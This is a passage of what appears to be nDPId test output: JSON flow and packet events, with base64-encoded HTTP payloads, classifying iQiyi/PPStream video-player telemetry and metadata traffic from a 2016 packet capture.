JmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} -01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7440000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} -01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=="} -01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 